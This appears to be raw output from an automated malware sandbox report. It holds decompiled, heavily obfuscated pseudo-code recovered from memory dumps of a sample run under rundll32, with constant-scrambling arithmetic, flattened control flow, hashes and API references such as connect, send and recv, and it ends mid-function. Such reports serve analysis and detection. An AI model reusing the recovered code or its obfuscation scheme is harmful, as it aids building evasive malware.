                                                                                                                    				_v1796 = 0xab825d;
                                                                                                                    				_v1796 = _v1796 << 0xc;
                                                                                                                    				_v1796 = _v1796 + 0xd01b;
                                                                                                                    				_t618 = 0x22;
                                                                                                                    				_v1796 = _v1796 / _t618;
                                                                                                                    				_v1796 = _v1796 ^ 0x056bf222;
                                                                                                                    				_v1724 = 0x6f3f31;
                                                                                                                    				_v1724 = _v1724 + 0x5a62;
                                                                                                                    				_v1724 = _v1724 / _t674;
                                                                                                                    				_v1724 = _v1724 ^ 0x0002d040;
                                                                                                                    				_v1652 = 0x230f16;
                                                                                                                    				_v1652 = _v1652 ^ 0x902061d9;
                                                                                                                    				_v1652 = _v1652 ^ 0x9007a9ef;
                                                                                                                    				_v1804 = 0xb250d0;
                                                                                                                    				_v1804 = _v1804 << 7;
                                                                                                                    				_v1804 = _v1804 << 0xe;
                                                                                                                    				_v1804 = _v1804 >> 0x10;
                                                                                                                    				_v1804 = _v1804 ^ 0x000e0b76;
                                                                                                                    				_v1644 = 0x39b2ec;
                                                                                                                    				_v1644 = _v1644 >> 5;
                                                                                                                    				_v1644 = _v1644 ^ 0x0004ae9a;
                                                                                                                    				_v1708 = 0x41b5f8;
                                                                                                                    				_v1708 = _v1708 << 9;
                                                                                                                    				_v1708 = _v1708 + 0xfffffd74;
                                                                                                                    				_v1708 = _v1708 ^ 0x836650ae;
                                                                                                                    				_v1768 = 0xd924a5;
                                                                                                                    				_t619 = 0x26;
                                                                                                                    				_v1768 = _v1768 * 0x57;
                                                                                                                    				_v1768 = _v1768 >> 4;
                                                                                                                    				_v1768 = _v1768 ^ 0x04932b37;
                                                                                                                    				_v1788 = 0x72a9d;
                                                                                                                    				_v1788 = _v1788 >> 0xb;
                                                                                                                    				_v1788 = _v1788 * 0x3f;
                                                                                                                    				_v1788 = _v1788 + 0xffffc8d5;
                                                                                                                    				_v1788 = _v1788 ^ 0x000eb520;
                                                                                                                    				_v1628 = 0x50edf9;
                                                                                                                    				_v1628 = _v1628 * 0x73;
                                                                                                                    				_v1628 = _v1628 ^ 0x245d5801;
                                                                                                                    				_v1772 = 0x77fe3c;
                                                                                                                    				_v1772 = _v1772 + 0x89a9;
                                                                                                                    				_v1772 = _v1772 | 0x772eb6e7;
                                                                                                                    				_v1772 = _v1772 + 0xffffc435;
                                                                                                                    				_v1772 = _v1772 ^ 0x777a10e8;
                                                                                                                    				_v1780 = 0x481950;
                                                                                                                    				_v1780 = _v1780 >> 0xb;
                                                                                                                    				_v1780 = _v1780 | 0x104efd63;
                                                                                                                    				_v1780 = _v1780 + 0xffffd02c;
                                                                                                                    				_v1780 = _v1780 ^ 0x1043876c;
                                                                                                                    				_v1636 = 0x899427;
                                                                                                                    				_v1636 = _v1636 << 0x10;
                                                                                                                    				_v1636 = _v1636 ^ 0x942ef0bd;
                                                                                                                    				_v1812 = 0xafb495;
                                                                                                                    				_v1812 = _v1812 | 0xf73eef3e;
                                                                                                                    				_v1812 = _v1812 + 0xffffb280;
                                                                                                                    				_v1812 = _v1812 ^ 0xf7b4985a;
                                                                                                                    				_v1732 = 0xe6dab0;
                                                                                                                    				_v1732 = _v1732 + 0x38b;
                                                                                                                    				_v1732 = _v1732 | 0x5f912f35;
                                                                                                                    				_v1732 = _v1732 ^ 0x5ff91c81;
                                                                                                                    				_v1660 = 0xa1ff8d;
                                                                                                                    				_v1660 = _v1660 / _t619;
                                                                                                                    				_v1660 = _v1660 ^ 0x000a69c5;
                                                                                                                    				_v1820 = 0xd15a88;
                                                                                                                    				_v1820 = _v1820 ^ 0xcd50b9e8;
                                                                                                                    				_v1820 = _v1820 >> 0x10;
                                                                                                                    				_v1820 = _v1820 ^ 0xf9319330;
                                                                                                                    				_v1820 = _v1820 ^ 0xf933c487;
                                                                                                                    				_t675 = _v1600;
                                                                                                                    				while(1) {
                                                                                                                    					L1:
                                                                                                                    					while(1) {
                                                                                                                    						L2:
                                                                                                                    						_t620 = 0x424d9d2;
                                                                                                                    						do {
                                                                                                                    							L3:
                                                                                                                    							while(_t677 != 0x19ebf08) {
                                                                                                                    								if(_t677 == _t620) {
                                                                                                                    									_push(_v1600);
                                                                                                                    									_push(_v1808);
                                                                                                                    									_t585 = E0034D389( &_v1564, _v1844, _t620,  &_v1596, _v1640, _t620);
                                                                                                                    									_t682 =  &(_t682[7]);
                                                                                                                    									__eflags = _t585;
                                                                                                                    									if(__eflags != 0) {
                                                                                                                    										E00341E67(_v1676, _v1836, _v1684, _v1692, _v1596);
                                                                                                                    										E00341E67(_v1828, _v1740, _v1748, _v1668, _v1592);
                                                                                                                    										_t682 =  &(_t682[6]);
                                                                                                                    									}
                                                                                                                    									L14:
                                                                                                                    									_t677 = 0x19ebf08;
                                                                                                                    									while(1) {
                                                                                                                    										L1:
                                                                                                                    										L2:
                                                                                                                    										_t620 = 0x424d9d2;
                                                                                                                    										goto L3;
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    								if(_t677 == 0x5bc69f5) {
                                                                                                                    									_t592 = E0034D2CE(_t620);
                                                                                                                    									__eflags = _t592 - E00333DE2(_t620);
                                                                                                                    									_t583 = 0x7574965;
                                                                                                                    									_t677 = 0x8166b1d;
                                                                                                                    									_t675 =  !=  ? 0x7574965 : 0x1e8df70;
                                                                                                                    									goto L2;
                                                                                                                    								}
                                                                                                                    								if(_t677 == 0x8166b1d) {
                                                                                                                    									__eflags = _t675 - _t583;
                                                                                                                    									if(__eflags != 0) {
                                                                                                                    										_t677 = 0xd369ee2;
                                                                                                                    										continue;
                                                                                                                    									}
                                                                                                                    									_push(_t620);
                                                                                                                    									_push(_t620);
                                                                                                                    									_t606 = E0034BB23( &_v1600, _v1616, _v1784, _v1656, _v1604, _v1756);
                                                                                                                    									_t682 =  &(_t682[6]);
                                                                                                                    									__eflags = _t606;
                                                                                                                    									if(__eflags == 0) {
                                                                                                                    										L12:
                                                                                                                    										return _t606;
                                                                                                                    									}
                                                                                                                    									_t677 = 0xd369ee2;
                                                                                                                    									goto L1;
                                                                                                                    								}
                                                                                                                    								if(_t677 == 0xb42e112) {
                                                                                                                    									_t677 = 0x5bc69f5;
                                                                                                                    									continue;
                                                                                                                    								}
                                                                                                                    								if(_t677 == 0xd369ee2) {
                                                                                                                    									E0034DA22(_v1840, _v1720, __eflags, _v1760,  &_v1044, _t620, _v1716);
                                                                                                                    									 *((short*)(E0033B6CF( &_v1044, _v1624, _v1728, _v1752))) = 0;
                                                                                                                    									E00338969(_v1688,  &_v524, __eflags, _v1620, _v1696);
                                                                                                                    									_push(_v1632);
                                                                                                                    									_push(_v1744);
                                                                                                                    									E003347CE( &_v1044, _v1672, _v1680, _v1832, _v1612, E0034DCF7(_v1680, 0x331328, __eflags),  &_v524, _v1776, _v1712);
                                                                                                                    									E0033A8B0(_v1704, _t598, _v1800);
                                                                                                                    									_t603 = E0033EA99(_v1664, _t609, _v1824, _v1764,  &_v1564, _v1736);
                                                                                                                    									_t682 =  &(_t682[0x17]);
                                                                                                                    									__eflags = _t603;
                                                                                                                    									if(__eflags != 0) {
                                                                                                                    										_t583 = 0x7574965;
                                                                                                                    										__eflags = _t675 - 0x7574965;
                                                                                                                    										_t620 = 0x424d9d2;
                                                                                                                    										_t677 =  ==  ? 0x424d9d2 : 0xe2e667c;
                                                                                                                    										continue;
                                                                                                                    									}
                                                                                                                    									goto L14;
                                                                                                                    								}
                                                                                                                    								_t696 = _t677 - 0xe2e667c;
                                                                                                                    								if(_t677 != 0xe2e667c) {
                                                                                                                    									goto L25;
                                                                                                                    								}
                                                                                                                    								_push(_v1804);
                                                                                                                    								_push( &_v1564);
                                                                                                                    								_push(_t620);
                                                                                                                    								_push(0);
                                                                                                                    								_push( &_v1596);
                                                                                                                    								_push(_v1652);
                                                                                                                    								_push(0);
                                                                                                                    								_t606 = E0033AB87(_v1796, _v1724, _t696);
                                                                                                                    								if(_t606 == 0) {
                                                                                                                    									goto L12;
                                                                                                                    								}
                                                                                                                    								E00341E67(_v1644, _v1708, _v1768, _v1788, _v1596);
                                                                                                                    								return E00341E67(_v1628, _v1772, _v1780, _v1636, _v1592);
                                                                                                                    							}
                                                                                                                    							E00341E67(_v1812, _v1732, _v1660, _v1820, _v1600);
                                                                                                                    							_t682 =  &(_t682[3]);
                                                                                                                    							_t677 = 0xe6feec1;
                                                                                                                    							_t583 = 0x7574965;
                                                                                                                    							_t620 = 0x424d9d2;
                                                                                                                    							L25:
                                                                                                                    							__eflags = _t677 - 0xe6feec1;
                                                                                                                    						} while (__eflags != 0);
                                                                                                                    						return _t583;
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    			}
                                                                                                                    0x00347590
                                                                                                                    0x0034759d
                                                                                                                    0x0034759e
                                                                                                                    0x003475a2
                                                                                                                    0x003475a7
                                                                                                                    0x003475af
                                                                                                                    0x003475b7
                                                                                                                    0x003475c1
                                                                                                                    0x003475c5
                                                                                                                    0x003475cd
                                                                                                                    0x003475d5
                                                                                                                    0x003475e8
                                                                                                                    0x003475ef
                                                                                                                    0x003475fa
                                                                                                                    0x00347602
                                                                                                                    0x0034760a
                                                                                                                    0x00347612
                                                                                                                    0x0034761a
                                                                                                                    0x00347622
                                                                                                                    0x0034762a
                                                                                                                    0x0034762f
                                                                                                                    0x00347637
                                                                                                                    0x0034763f
                                                                                                                    0x00347647
                                                                                                                    0x00347652
                                                                                                                    0x0034765a
                                                                                                                    0x00347665
                                                                                                                    0x0034766d
                                                                                                                    0x00347675
                                                                                                                    0x0034767d
                                                                                                                    0x00347685
                                                                                                                    0x00347690
                                                                                                                    0x0034769b
                                                                                                                    0x003476a6
                                                                                                                    0x003476b1
                                                                                                                    0x003476c5
                                                                                                                    0x003476cc
                                                                                                                    0x003476d7
                                                                                                                    0x003476df
                                                                                                                    0x003476e7
                                                                                                                    0x003476ec
                                                                                                                    0x003476f4
                                                                                                                    0x003476fc
                                                                                                                    0x00347703
                                                                                                                    0x00347703
                                                                                                                    0x00347708
                                                                                                                    0x00347708
                                                                                                                    0x00347708
                                                                                                                    0x0034770d
                                                                                                                    0x00000000
                                                                                                                    0x0034770d
                                                                                                                    0x00347717
                                                                                                                    0x0034799c
                                                                                                                    0x003479aa
                                                                                                                    0x003479ca
                                                                                                                    0x003479cf
                                                                                                                    0x003479d2
                                                                                                                    0x003479d4
                                                                                                                    0x003479fa
                                                                                                                    0x00347a1f
                                                                                                                    0x00347a24
                                                                                                                    0x00347a24
                                                                                                                    0x003478e9
                                                                                                                    0x003478e9
                                                                                                                    0x00347703
                                                                                                                    0x00347703
                                                                                                                    0x00347708
                                                                                                                    0x00347708
                                                                                                                    0x00000000
                                                                                                                    0x00347708
                                                                                                                    0x00347703
                                                                                                                    0x00347723
                                                                                                                    0x00347977
                                                                                                                    0x00347983
                                                                                                                    0x0034798a
                                                                                                                    0x0034798f
                                                                                                                    0x00347994
                                                                                                                    0x00000000
                                                                                                                    0x00347994
                                                                                                                    0x0034772f
                                                                                                                    0x00347913
                                                                                                                    0x00347915
                                                                                                                    0x00347957
                                                                                                                    0x00000000
                                                                                                                    0x00347957
                                                                                                                    0x00347917
                                                                                                                    0x00347918
                                                                                                                    0x0034793d
                                                                                                                    0x00347942
                                                                                                                    0x00347945
                                                                                                                    0x00347947
                                                                                                                    0x003477e4
                                                                                                                    0x003477e4
                                                                                                                    0x003477e4
                                                                                                                    0x0034794d
                                                                                                                    0x00000000
                                                                                                                    0x0034794d
                                                                                                                    0x0034773b
                                                                                                                    0x00347909
                                                                                                                    0x00000000
                                                                                                                    0x00347909
                                                                                                                    0x00347747
                                                                                                                    0x00347804
                                                                                                                    0x0034783e
                                                                                                                    0x00347848
                                                                                                                    0x0034784d
                                                                                                                    0x00347859
                                                                                                                    0x003478a6
                                                                                                                    0x003478b8
                                                                                                                    0x003478dd
                                                                                                                    0x003478e2
                                                                                                                    0x003478e5
                                                                                                                    0x003478e7
                                                                                                                    0x003478f0
                                                                                                                    0x003478fa
                                                                                                                    0x003478fc
                                                                                                                    0x00347901
                                                                                                                    0x00000000
                                                                                                                    0x00347901
                                                                                                                    0x00000000
                                                                                                                    0x003478e7
                                                                                                                    0x0034774d
                                                                                                                    0x00347753
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00347759
                                                                                                                    0x00347764
                                                                                                                    0x00347765
                                                                                                                    0x00347766
                                                                                                                    0x0034776f
                                                                                                                    0x00347770
                                                                                                                    0x00347782
                                                                                                                    0x00347784
                                                                                                                    0x0034778e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003477ad
                                                                                                                    0x00000000
                                                                                                                    0x003477d7
                                                                                                                    0x00347a49
                                                                                                                    0x00347a4e
                                                                                                                    0x00347a51
                                                                                                                    0x00347a56
                                                                                                                    0x00347a5b
                                                                                                                    0x00347a60
                                                                                                                    0x00347a60
                                                                                                                    0x00347a60
                                                                                                                    0x00000000
                                                                                                                    0x0034770d
                                                                                                                    0x00347708

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 1?o$;X$>GU$CmN$G^FX$UoZ$^P>$bZ$ci1$X9$f$v(
                                                                                                                    • API String ID: 0-2206596976
                                                                                                                    • Opcode ID: 774e4cb58658125458335f69690b0d827648cf5993753a4c6b7ddc5dd3396218
                                                                                                                    • Instruction ID: 4a93c34ba22f261829b28e43676bdae2753b01e3d3f3812f8f15b3ac96b3e3bf
                                                                                                                    • Opcode Fuzzy Hash: 774e4cb58658125458335f69690b0d827648cf5993753a4c6b7ddc5dd3396218
                                                                                                                    • Instruction Fuzzy Hash: CC52FD715083819BD379CF21C58AB9FBBE1BBC4308F108A1DE5DA9A260D7B19949CF53
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 10012C6C
                                                                                                                    • connect.WS2_32(?,?,00000010), ref: 10012CA7
                                                                                                                    • _strcat.LIBCMT ref: 10012CE9
                                                                                                                    • send.WS2_32(?,?,00000064,00000000), ref: 10012D06
                                                                                                                    • recv.WS2_32(000000FF,?,00000064,00000000), ref: 10012D9D
                                                                                                                      • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                      • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                      • Part of subcall function 1001DD46: GetDlgItem.USER32(?,3F6A93DE), ref: 1001DD53
                                                                                                                      • Part of subcall function 1001DDF4: SetWindowTextA.USER32(?,00000064), ref: 1001DE2B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$EnableItemText_memset_strcatconnectrecvsend
                                                                                                                    • String ID: Connected$Disconnected$Wait...
                                                                                                                    • API String ID: 2263617321-2304371739
                                                                                                                    • Opcode ID: 5b08e9dbcbe72183f65bc00083dd8b9667ad7d5dfeacba7cbb0734b26863e533
                                                                                                                    • Instruction ID: 809deafcd8a1ebdff950075e8a5ab3cba01c3ccaf73ffb16f134ff4a091f78a6
                                                                                                                    • Opcode Fuzzy Hash: 5b08e9dbcbe72183f65bc00083dd8b9667ad7d5dfeacba7cbb0734b26863e533
                                                                                                                    • Instruction Fuzzy Hash: 88513DB4A002189BDB14EBA8CC95BEEB7B1FF48308F104169E5066F2C2DF75A991CF44
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E00332251(void* __ecx, signed int* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                    				char _v40;
                                                                                                                    				signed int _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				signed int _v56;
                                                                                                                    				signed int _v60;
                                                                                                                    				signed int _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				signed int _v72;
                                                                                                                    				signed int _v76;
                                                                                                                    				signed int _v80;
                                                                                                                    				signed int _v84;
                                                                                                                    				signed int _v88;
                                                                                                                    				signed int _v92;
                                                                                                                    				signed int _v96;
                                                                                                                    				signed int _v100;
                                                                                                                    				signed int _v104;
                                                                                                                    				signed int _v108;
                                                                                                                    				signed int _v112;
                                                                                                                    				signed int _v116;
                                                                                                                    				signed int _v120;
                                                                                                                    				signed int _v124;
                                                                                                                    				signed int _v128;
                                                                                                                    				signed int _v132;
                                                                                                                    				signed int _v136;
                                                                                                                    				signed int _v140;
                                                                                                                    				signed int _v144;
                                                                                                                    				signed int _v148;
                                                                                                                    				signed int _v152;
                                                                                                                    				signed int _v156;
                                                                                                                    				signed int _v160;
                                                                                                                    				signed int _v164;
                                                                                                                    				signed int _v168;
                                                                                                                    				signed int _v172;
                                                                                                                    				signed int _v176;
                                                                                                                    				signed int _v180;
                                                                                                                    				void* _t323;
                                                                                                                    				signed int _t369;
                                                                                                                    				signed int _t371;
                                                                                                                    				signed int _t372;
                                                                                                                    				signed int _t373;
                                                                                                                    				signed int _t374;
                                                                                                                    				signed int _t375;
                                                                                                                    				signed int _t376;
                                                                                                                    				signed int _t377;
                                                                                                                    				signed int _t378;
                                                                                                                    				signed int _t379;
                                                                                                                    				void* _t382;
                                                                                                                    				signed int* _t424;
                                                                                                                    				void* _t427;
                                                                                                                    				void* _t428;
                                                                                                                    				void* _t431;
                                                                                                                    
                                                                                                                    				_t425 = _a4;
                                                                                                                    				_push(_a12);
                                                                                                                    				_t424 = __edx;
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__edx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E003420B9(_t323);
                                                                                                                    				_v104 = 0xfd7ba2;
                                                                                                                    				_t428 = _t427 + 0x14;
                                                                                                                    				_v104 = _v104 << 2;
                                                                                                                    				_v104 = _v104 ^ 0x03f5ee88;
                                                                                                                    				_t382 = 0x3e8dc94;
                                                                                                                    				_v112 = 0x53a35e;
                                                                                                                    				_t371 = 0x1c;
                                                                                                                    				_v112 = _v112 / _t371;
                                                                                                                    				_v112 = _v112 << 0xb;
                                                                                                                    				_v112 = _v112 ^ 0x17ec1018;
                                                                                                                    				_v100 = 0x45b9a1;
                                                                                                                    				_v100 = _v100 + 0xffff7cfc;
                                                                                                                    				_v100 = _v100 ^ 0x004aa95b;
                                                                                                                    				_v92 = 0xd93693;
                                                                                                                    				_v92 = _v92 + 0xb87a;
                                                                                                                    				_v92 = _v92 ^ 0x00df4f59;
                                                                                                                    				_v160 = 0x746cf1;
                                                                                                                    				_v160 = _v160 ^ 0x2b133776;
                                                                                                                    				_v160 = _v160 + 0xffff944c;
                                                                                                                    				_v160 = _v160 / _t371;
                                                                                                                    				_v160 = _v160 ^ 0x0189d9d1;
                                                                                                                    				_v144 = 0x9ec305;
                                                                                                                    				_v144 = _v144 + 0xffffd43e;
                                                                                                                    				_v144 = _v144 << 3;
                                                                                                                    				_v144 = _v144 ^ 0x04f670ec;
                                                                                                                    				_v148 = 0x64c482;
                                                                                                                    				_v148 = _v148 + 0x3823;
                                                                                                                    				_t372 = 0x6f;
                                                                                                                    				_v148 = _v148 / _t372;
                                                                                                                    				_v148 = _v148 ^ 0x000f1a49;
                                                                                                                    				_v68 = 0x131d36;
                                                                                                                    				_v68 = _v68 ^ 0xb06b804d;
                                                                                                                    				_v68 = _v68 ^ 0xb072f73d;
                                                                                                                    				_v124 = 0xcf68d3;
                                                                                                                    				_v124 = _v124 + 0x418a;
                                                                                                                    				_v124 = _v124 + 0xdb2c;
                                                                                                                    				_v124 = _v124 ^ 0x00d4c88c;
                                                                                                                    				_v140 = 0x60ea9a;
                                                                                                                    				_v140 = _v140 >> 0xa;
                                                                                                                    				_v140 = _v140 >> 4;
                                                                                                                    				_v140 = _v140 ^ 0x0002f747;
                                                                                                                    				_v116 = 0xa906b8;
                                                                                                                    				_t373 = 0x61;
                                                                                                                    				_v116 = _v116 * 0x66;
                                                                                                                    				_v116 = _v116 / _t373;
                                                                                                                    				_v116 = _v116 ^ 0x00b9e105;
                                                                                                                    				_v152 = 0x1b4b23;
                                                                                                                    				_v152 = _v152 + 0x6529;
                                                                                                                    				_v152 = _v152 << 7;
                                                                                                                    				_v152 = _v152 ^ 0x0dd37b6c;
                                                                                                                    				_v56 = 0xb64e13;
                                                                                                                    				_t374 = 0x36;
                                                                                                                    				_v56 = _v56 / _t374;
                                                                                                                    				_v56 = _v56 ^ 0x000ccadc;
                                                                                                                    				_v180 = 0xa61587;
                                                                                                                    				_v180 = _v180 ^ 0x79fc160a;
                                                                                                                    				_t375 = 0x7a;
                                                                                                                    				_v180 = _v180 * 0x16;
                                                                                                                    				_v180 = _v180 ^ 0x4f1bf23d;
                                                                                                                    				_v180 = _v180 ^ 0x22abe71e;
                                                                                                                    				_v120 = 0x473252;
                                                                                                                    				_v120 = _v120 + 0xffff4692;
                                                                                                                    				_v120 = _v120 / _t375;
                                                                                                                    				_v120 = _v120 ^ 0x000f54d2;
                                                                                                                    				_v60 = 0x2fd158;
                                                                                                                    				_v60 = _v60 + 0x5b64;
                                                                                                                    				_v60 = _v60 ^ 0x0034a0e9;
                                                                                                                    				_v84 = 0xc57bbf;
                                                                                                                    				_v84 = _v84 ^ 0x7beef004;
                                                                                                                    				_v84 = _v84 ^ 0x7b204221;
                                                                                                                    				_v52 = 0xc39e48;
                                                                                                                    				_t376 = 0x4d;
                                                                                                                    				_v52 = _v52 / _t376;
                                                                                                                    				_v52 = _v52 ^ 0x0006d078;
                                                                                                                    				_v108 = 0x102acf;
                                                                                                                    				_v108 = _v108 >> 0xa;
                                                                                                                    				_v108 = _v108 ^ 0x000242b6;
                                                                                                                    				_v80 = 0xaaee53;
                                                                                                                    				_t377 = 0x79;
                                                                                                                    				_v80 = _v80 * 0x74;
                                                                                                                    				_v80 = _v80 ^ 0x4d7dabdb;
                                                                                                                    				_v88 = 0x1ad2b9;
                                                                                                                    				_v88 = _v88 | 0x310da8db;
                                                                                                                    				_v88 = _v88 ^ 0x311cb062;
                                                                                                                    				_v136 = 0x81cc6c;
                                                                                                                    				_v136 = _v136 >> 0xc;
                                                                                                                    				_v136 = _v136 << 0xd;
                                                                                                                    				_v136 = _v136 ^ 0x0107e876;
                                                                                                                    				_v96 = 0x2bc0c4;
                                                                                                                    				_v96 = _v96 * 0x4c;
                                                                                                                    				_v96 = _v96 ^ 0x0cfd01fe;
                                                                                                                    				_v176 = 0x403c4e;
                                                                                                                    				_t174 =  &_v176; // 0x403c4e
                                                                                                                    				_v176 =  *_t174 / _t377;
                                                                                                                    				_t180 =  &_v176; // 0x403c4e
                                                                                                                    				_v176 =  *_t180 * 0x5e;
                                                                                                                    				_v176 = _v176 << 5;
                                                                                                                    				_v176 = _v176 ^ 0x0632c8a8;
                                                                                                                    				_v44 = 0x1618ce;
                                                                                                                    				_v44 = _v44 + 0xffff8813;
                                                                                                                    				_v44 = _v44 ^ 0x00124c47;
                                                                                                                    				_v76 = 0x551030;
                                                                                                                    				_v76 = _v76 + 0x65ef;
                                                                                                                    				_v76 = _v76 ^ 0x005f521e;
                                                                                                                    				_v132 = 0xb7ed4f;
                                                                                                                    				_v132 = _v132 << 0xb;
                                                                                                                    				_v132 = _v132 >> 0xa;
                                                                                                                    				_v132 = _v132 ^ 0x002e4b92;
                                                                                                                    				_v64 = 0xfb13c3;
                                                                                                                    				_v64 = _v64 * 0x16;
                                                                                                                    				_v64 = _v64 ^ 0x159ca6b2;
                                                                                                                    				_v168 = 0x8e8363;
                                                                                                                    				_v168 = _v168 ^ 0x49fc5726;
                                                                                                                    				_v168 = _v168 >> 8;
                                                                                                                    				_v168 = _v168 >> 4;
                                                                                                                    				_v168 = _v168 ^ 0x0002bf0f;
                                                                                                                    				_v72 = 0x8b4c84;
                                                                                                                    				_t378 = 0x68;
                                                                                                                    				_v72 = _v72 / _t378;
                                                                                                                    				_v72 = _v72 ^ 0x00015b8a;
                                                                                                                    				_v128 = 0x282e65;
                                                                                                                    				_v128 = _v128 >> 3;
                                                                                                                    				_v128 = _v128 << 9;
                                                                                                                    				_v128 = _v128 ^ 0x0a079d52;
                                                                                                                    				_v156 = 0xadd370;
                                                                                                                    				_t379 = 0x3e;
                                                                                                                    				_v156 = _v156 / _t379;
                                                                                                                    				_v156 = _v156 << 0xf;
                                                                                                                    				_v156 = _v156 + 0xffff35e7;
                                                                                                                    				_v156 = _v156 ^ 0x66d9d095;
                                                                                                                    				_v164 = 0xb0b7ce;
                                                                                                                    				_v164 = _v164 + 0xffffdc7a;
                                                                                                                    				_v164 = _v164 * 0x61;
                                                                                                                    				_v164 = _v164 + 0xffff24b0;
                                                                                                                    				_v164 = _v164 ^ 0x42ea90cd;
                                                                                                                    				_v172 = 0xee7b33;
                                                                                                                    				_v172 = _v172 | 0x904c1683;
                                                                                                                    				_v172 = _v172 * 0x2c;
                                                                                                                    				_v172 = _v172 >> 4;
                                                                                                                    				_v172 = _v172 ^ 0x0e8d9d52;
                                                                                                                    				_v48 = 0xdaf5e6;
                                                                                                                    				_v48 = _v48 ^ 0xf4ca4d64;
                                                                                                                    				_v48 = _v48 ^ 0xf41f1779;
                                                                                                                    				goto L1;
                                                                                                                    				do {
                                                                                                                    					while(1) {
                                                                                                                    						L1:
                                                                                                                    						_t431 = _t382 - 0x9c1484f;
                                                                                                                    						if(_t431 > 0) {
                                                                                                                    							break;
                                                                                                                    						}
                                                                                                                    						if(_t431 == 0) {
                                                                                                                    							E00333DBC( &_v40, _t424, _v160, _v144, _v148);
                                                                                                                    							_t428 = _t428 + 0xc;
                                                                                                                    							_t382 = 0x9229f3e;
                                                                                                                    							continue;
                                                                                                                    						} else {
                                                                                                                    							if(_t382 == 0x3e8dc94) {
                                                                                                                    								_t382 = 0xb0d10f2;
                                                                                                                    								 *_t424 =  *_t424 & 0x00000000;
                                                                                                                    								_t424[1] = _v104;
                                                                                                                    								continue;
                                                                                                                    							} else {
                                                                                                                    								if(_t382 == 0x73dcb22) {
                                                                                                                    									E00340DAF(_v176,  &_v40, _v44,  *((intOrPtr*)(_t425 + 0x44)), _v76, _v132);
                                                                                                                    									_t428 = _t428 + 0x10;
                                                                                                                    									_t382 = 0xca0d778;
                                                                                                                    									continue;
                                                                                                                    								} else {
                                                                                                                    									if(_t382 == 0x8cfc35c) {
                                                                                                                    										E00340DAF(_v60,  &_v40, _v84,  *((intOrPtr*)(_t425 + 0x3c)), _v52, _v108);
                                                                                                                    										_t428 = _t428 + 0x10;
                                                                                                                    										_t382 = 0xfa9ed0f;
                                                                                                                    										continue;
                                                                                                                    									} else {
                                                                                                                    										if(_t382 == 0x9229f3e) {
                                                                                                                    											E00350E3A( &_v40, _v68, __eflags, _v124, _v140, _v116, _t425 + 0x1c);
                                                                                                                    											_t428 = _t428 + 0x10;
                                                                                                                    											_t382 = 0xa7e786e;
                                                                                                                    											continue;
                                                                                                                    										} else {
                                                                                                                    											if(_t382 != 0x95701e8) {
                                                                                                                    												goto L24;
                                                                                                                    											} else {
                                                                                                                    												_push(_t382);
                                                                                                                    												_push(_t382);
                                                                                                                    												_t369 = E00337FF2(_t424[1]);
                                                                                                                    												 *_t424 = _t369;
                                                                                                                    												if(_t369 != 0) {
                                                                                                                    													_t382 = 0x9c1484f;
                                                                                                                    													continue;
                                                                                                                    												}
                                                                                                                    											}
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						L27:
                                                                                                                    						__eflags =  *_t424;
                                                                                                                    						_t322 =  *_t424 != 0;
                                                                                                                    						__eflags = _t322;
                                                                                                                    						return 0 | _t322;
                                                                                                                    					}
                                                                                                                    					__eflags = _t382 - 0xa7e786e;
                                                                                                                    					if(_t382 == 0xa7e786e) {
                                                                                                                    						E00340DAF(_v152,  &_v40, _v56,  *((intOrPtr*)(_t425 + 0x48)), _v180, _v120);
                                                                                                                    						_t428 = _t428 + 0x10;
                                                                                                                    						_t382 = 0x8cfc35c;
                                                                                                                    						goto L24;
                                                                                                                    					} else {
                                                                                                                    						__eflags = _t382 - 0xa84b454;
                                                                                                                    						if(__eflags == 0) {
                                                                                                                    							E00350E3A( &_v40, _v156, __eflags, _v164, _v172, _v48, _t425 + 0x14);
                                                                                                                    						} else {
                                                                                                                    							__eflags = _t382 - 0xb0d10f2;
                                                                                                                    							if(_t382 == 0xb0d10f2) {
